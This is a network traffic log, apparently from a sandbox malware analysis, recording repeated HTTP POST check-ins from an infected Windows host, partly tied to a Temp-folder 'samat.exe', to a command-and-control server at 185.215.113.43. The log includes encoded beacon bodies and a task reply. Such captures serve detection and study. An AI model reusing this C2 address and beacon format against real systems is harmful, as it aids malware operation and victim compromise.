Nov 21, 2024 22:18:05.582566023 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:07.011620998 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.5	50139	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:08.761729956 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:10.107698917 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.5	50140	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:11.735997915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:13.136445999 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	50141	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:14.882879019 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:16.269908905 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	50142	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:17.895167112 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:19.233886957 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	50143	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:20.975855112 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:22.396718025 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	50144	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:24.023077011 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:25.505191088 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.5	50145	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:27.256438017 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:28.654191017 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	50146	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:30.288851023 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:31.674215078 CET	287	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 0d 0a 20 3c 63 3e 31 30 30 38 30 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 31 35 34 34 31 62 62 35 64 66 30 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 61 <c>1008030001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70915441bb5df002415450#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	50148	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:35.867182970 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008030001&unit=246122658369
Nov 21, 2024 22:18:37.261198044 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	50149	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:39.007327080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:40.385231972 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	50150	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:42.024131060 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:43.361336946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	50151	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:45.116002083 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:46.556965113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50154	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:51.335454941 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:52.674668074 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	50156	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:54.305783987 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:55.640656948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	50157	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:18:57.383908987 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:18:58.767621040 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	50158	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:00.401072979 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:01.783226967 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50159	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:03.521878958 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:04.909271955 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	50160	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:06.553194046 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:07.923322916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	50161	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:09.662390947 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:11.043358088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50162	185.215.113.43	80	3952	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:12.686312914 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:14.072290897 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.5	50163	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:15.819608927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:17.199826956 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50164	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:18.839622974 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:20.217869043 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.5	50166	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:24.945606947 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:26.386147022 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.5	50167	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:28.132998943 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
